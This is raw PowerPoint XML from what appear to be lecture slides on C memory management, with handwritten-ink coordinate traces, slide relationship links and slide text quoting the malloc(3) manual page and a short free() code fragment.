  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="7470">19328 5456,'0'-3,"-52"-38,52 41,-80-61,-24-36,-18-14,-6-14,20 22,36 24,15 26,27 28</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="8695">19508 5162,'72'17,"-3"-22,7-10,1-10,5-2,9-1,-8-3,-20 3,-22-11,-25-33,-19-17,-14-16,-25-16,-9-16,-8-11,5-3,18 4,14 4,34 16,10 19,31 17,14 12,25 14,-1 9,8-2,-2 5,-2 6,-2 3,-11 10,-9-4,-29 21,-9-4,-15 13,-2 8,-10 18,-22 7,-3-6,-29 27,3 5,1-4,11-14,18-13,12-14,2-10,23-21,21-23,5-13,-18 13,-3 17,-11 11,-7 9,-16-5,-33-13,-8-27,-12 22,8 10,3 19</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="12315">5016 6156,'2'-4,"0"-2,-2 6,0 0,0 0,3-1,-3 1,0 0,4 1,-4-1,6 3,-6 1,0-4,0 0,0 0,0 0,-15 11,15-11,0 0,0 0,-34 13,34-13,0 0,-50 6,50-6,-57 4,-7-4,-2 4,-5 12,7-3,-3 2,-4-18,0-4,-11 5,-11-7,-4 7,12 2,-4-14,6 12,1-9,13-4,13 0,14 6,11 14</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="13721">21997 2833,'7'-6,"-2"3,-5 3,0 0,0 0,0 0,0 0,1 1,-1-1,0 0,0 0,0 0,-4 14,4-14,0 0,0 0,-2 33,2-33,0 0,-5 61,5-61,0 40,-11 10,17-37,9 4,10-7,6-12,-2-5,-1 1,0-1,0-4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="14013">22192 2887,'0'0,"1"2,-1-2,0 0,0 0,6 21,-6-21,0 0,5 56,-5-56,1 79,3 4,-2-2,5-20,0-40,-7-19</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="14472">22465 2904,'-4'31,"2"-6,2-25,0 0,0 0,-22 37,22-37,0 0,-4 17,4-17,4 23,-4-4,7-11,2-8,15-10,1-7,13 6,10 1,4 8,-1 19</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="14758">22682 2827,'0'38,"-7"10,7-48,-10 69,6 13,12-12,0-20,9-23,-7-23</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="15072">22974 2860,'9'40,"-9"4,0-44,-6 68,8-14,10-10,2 20,4-48</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="15436">23179 2886,'6'16,"-18"46,12-62,-12 65,9-11,10-25,12-25,11-13,14-31,0 3,9-7,-5 25,1 17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="15661">23387 2727,'-5'11,"-3"61,8-72,2 101,18 26,7 24,4 12</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="42280">2191 7567,'-3'-15,"-6"-4,9 19,0 0,0 0,-3-9,3 9,0 0,-2-1,2 1,-14 12,-33 10,47-22</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3:32.182"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#0070C0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">7769 6986,'4'-15,"3"-6,-7 21,0 0,0 0,10-18,-10 18,0 0,11-16,-11 16,1-3,-13 8,12-5,0 0,0 0,-48 11,48-11,0 0,-74 12,74-12,-96 11,-4-3,10-5,25-1,23 4,20-1,16 1,8 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="261">7887 7007,'-29'4,"-68"1,97-5,-129 8,-31-7,-4-2,11 2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="30527">4540 6155,'-5'-2,"-10"0,15 2,0 0,0 0,-22 1,22-1,0 0,-33 7,33-7,-55 13,-19-11,-21 0,-10-6,-6 4,3 11,-9 8,2 6,0-1,14-18,6 5,-9-25,-20-3,-26 0,4-10,8 41,7-15,9 14,6 5,11-30,34-13,33-16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5:50.318"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#0070C0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">822 3778,'8'-25,"-1"6,-7 19,0 0,0 0,16-16,-16 16,0 0,25-12,-25 12,50-27,21 10,11-4,5 13,25-15,15 19,23 8,-3-17,10 10,4 10,14-11,16 10,12 0,-9 6,-27-2,-12 24,-4-15,-20 15,-12 1,-26 2,-44-1,-24 11,-23 10,-40 17,-27 16,-25 11,-30-15,-36-22,-35-25,-29-24,-16 0,9 1,4-20,-1 3,-7-4,3-22,26-3,22-19,37-25,38 2,56-11,55-5,51-14,13 22,-2 30</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1273">582 3166,'17'-5,"20"0,-37 5,0 0,58-4,-58 4,73 9,15 6,6-19,-27 12,-31-7,-27-2,-11-17,-21-5,-10-4,1-6,1 9,7 15,6 10,11 15,25 10,30 10,20 2,-17-5,-24-9,-17-1,-24 1,-29-2,-29-8,-7 10,13-6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2139">387 3882,'4'-11,"2"4,-6 7,0 0,0 0,21-5,-21 5,0 0,42 3,-42-3,59 7,17 21,10-4,8-14,3 10,-21-13,-19 5,-29-7,-25-10,-24-10,-31-31,-4-4,6 2,33 35,20 9,25 11,20 20,8 30,-14 18,-26-33,-35 1,-10-22,-27 13,-17-10,-27 12</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="19178">2192 8919,'-8'-13,"0"10,8 3,0 0,0 0,-12 6,12-6,0 0,-15 17,15-17,-31 36,-21 6,-27-5,-20-11,-18-21,-9 8,-29-15,-6 23,-23-16,9 32,33-28,36 11,37-2,28-2,12 7,8 26,3 4,14 30,14 6,25 6,16 13,-3 24,-16-15,-2 25,-5-24,2 5,-3-21,-12-15,-17-12,3-15,4-39,18 11,18-5,25-5,25-5,47 6,42-18,23-20,17-1,54 11</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="48842">6833 13549,'11'21,"-10"-14,-1-7,0 0,0 0,0 0,0 0,0 0,-5-15,5 15,-19-30,-25 4,44 26,0 0,-49-10,49 10,-59 3,5 10,7 15,15 18,-11 2,-29-8,-35-23,-20-27,-18-18,2-6,12 16,28 24,22 14,-14 11,-32-14,-27-18,-33-23,6-2,-4 3,-6 10,25 24,33 24,5 4,14 5</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11T18:07:10.562"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#0070C0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">13982 12776,'8'-9,"14"-2,-22 11,0 0,44-12,-44 12,57-13,9 0,7 1,14 3,19 9,11 3,20 3,-4-1,-8-7,-13-1,-3-2,-14-1,6-3,1 2,13 4,33 6,13 4,6-3,11 2,-6-6,5 5,17 5,-7 6,15-4,-5-4,29-3,-7 6,-2 0,25-7,-30-2,4-8,3-9,2 6,11 6,6 0,-5-2,-20-1,24-7,-26 7,1-13,-24 6,-3-4,-12 12,-6 9,2 20</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2809">20516 10709,'-37'14,"-9"9,46-23,-50 23,1 5,-3 11,23 29,24 23,25 22,5 8,-15 0,-6-16,0-12,8-15,12-18,12-26,-7-21,-18-19,11-28,8-31,22-15,-20 36,-17 29,-22 22,-19 27,-23 13,19 9,-15-35,-13-27,-38-68,-20-22,10-7,46 41,38 41</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="20590">21133 12572,'22'-16,"-19"10,-3 6,0 0,0 0,-4-3,4 3,0 0,-14-1,14 1,-15 11,-3 29,18-40,0 0,-4 59,4-59,11 84,-3 12,-1 10,2 0,0-12,-16-30,1-34,-17-16,-13-22,-27-20,-29 0,-21 12,-33 16,0 11,-13 4,14-5,-11 3,0 7,2 9,8-11,21-14,14-13,11-10,35-5,18-3,12 7,11 1,4-7,1-6,12-22,8-17,-1-31,4-30,-1 11,12 40,0 17,-10 23,-3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2/17/14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164752-E82A-9040-AFAD-418ECEC2CF95}" type="datetime3">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17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FCAEBE-12A9-B048-AFE7-52A105C36B1F}" type="datetime3">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17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5FD9-FA70-A641-8E0B-DBADE2AD5B4E}" type="datetime3">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17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B4456-C237-354E-86B5-4EB9C2A3C548}" type="datetime3">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17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EFF1A2-4BFD-3741-82EC-5EFF24CBE7C6}" type="datetime3">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17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7F924-1D35-FB46-A0DF-A60646E01993}" type="datetime3">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17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E5284-CECB-3E40-9FAA-B7E74DF82250}" type="datetime3">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17 February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ECB7DC-A67E-1643-A07B-36EE36B70AC2}" type="datetime3">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17 February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3A27C-CC62-5745-8084-7268B0FD8B63}" type="datetime3">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17 February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0422A-1226-7441-970E-C0C4D8A51172}" type="datetime3">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17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B17ED-2524-B545-BC9D-9BB9FCD2C54E}" type="datetime3">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17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6B8CBBD-DC24-5C4D-8DA8-8B27CAB39F93}" type="datetime3">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17 February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5.xml"/><Relationship Id="rId3"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6.xml"/><Relationship Id="rId3"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7.xml"/><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8.xml"/><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9.xml"/><Relationship Id="rId3"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0.xml"/><Relationship Id="rId3"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customXml" Target="../ink/ink11.xml"/><Relationship Id="rId4"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customXml" Target="../ink/ink12.xml"/><Relationship Id="rId4"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hyperlink" Target="What's%20the%20Greatest%20Software%20Ever%20Written?_%5D(http:%5C%5Cwww.informationweek.com%5Cwhats-the-greatest-software-ever-written%5Cd%5Cd-id%5C1046033?print=yes),%20InformationWeek,%2011%20August%20200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3.xml"/><Relationship Id="rId3"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customXml" Target="../ink/ink14.xml"/><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5.xml"/><Relationship Id="rId3"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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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7.xml"/><Relationship Id="rId3"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hyperlink" Target="http://securitydigest.org/tcp-ip/archive/1988/11" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink18.xml"/><Relationship Id="rId6"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customXml" Target="../ink/ink19.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.emf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.paulgraham.com/college.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4"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1.xml"/><Relationship Id="rId3"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2.xml"/><Relationship Id="rId3"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customXml" Target="../ink/ink23.xml"/><Relationship Id="rId5"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customXml" Target="../ink/ink24.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.em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customXml" Target="../ink/ink25.xml"/><Relationship Id="rId6"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ustomXml" Target="../ink/ink26.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.emf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.phrack.org/issues.html?issue=61&amp;id=6"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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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28.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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3.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4.xml"/><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21" t="22712" b="2928"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9193089" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="166988" y="4291908"/>
            <a:ext cx="3794500" cy="858189"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>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66988" y="3375876"/>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8</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21"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rPr>
              <a:t>Managing Memory</a:t>
            </a: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0536"/>
            <a:ext cx="8229600" cy="857250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Memory Management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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35596655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9266" y="411809"/>
            <a:ext cx="7498777" cy="4093428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>MALLOC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>(3)     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>BSD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>Library Functions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>Manual</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SYNOPSIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>     ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>     void free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>(void *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>)</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     void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t> size);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t> </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DESCRIPTION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>malloc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calloc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valloc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realloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>(), and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>reallocf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>() functions allocate memory.  The allocated memory is aligned such that it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>used for any data type, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>…. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>free() function frees allocations that were created via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>the preceding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>allocation functions</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="-2000251" y="2000251"/>
            <a:ext cx="5143502" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>C Memory Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000"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142720" y="1989360"/>
              <a:ext cx="5795280" cy="1643040"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2133360" y="1980000"/>
                <a:ext cx="5814000" cy="1661760"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84857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
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619073" y="542393"/>
            <a:ext cx="5854750"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708951" y="2891422"/>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60680" y="863640"/>
              <a:ext cx="7944480" cy="1860840"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="751320" y="854280"/>
                <a:ext cx="7963200" cy="1879560"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2021125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sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619073" y="253218"/>
            <a:ext cx="5854750" cy="2862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590805" y="2743761"/>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66440" y="2214360"/>
              <a:ext cx="2073240" cy="315000"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="757080" y="2205000"/>
                <a:ext cx="2091960" cy="333720"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1855877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
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="211062" y="154737"/>
            <a:ext cx="585475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smtClean="0">
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>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smtClean="0">
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>free(x)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="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545813" y="2285868"/>
            <a:ext cx="8342359" cy="267765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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gash&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
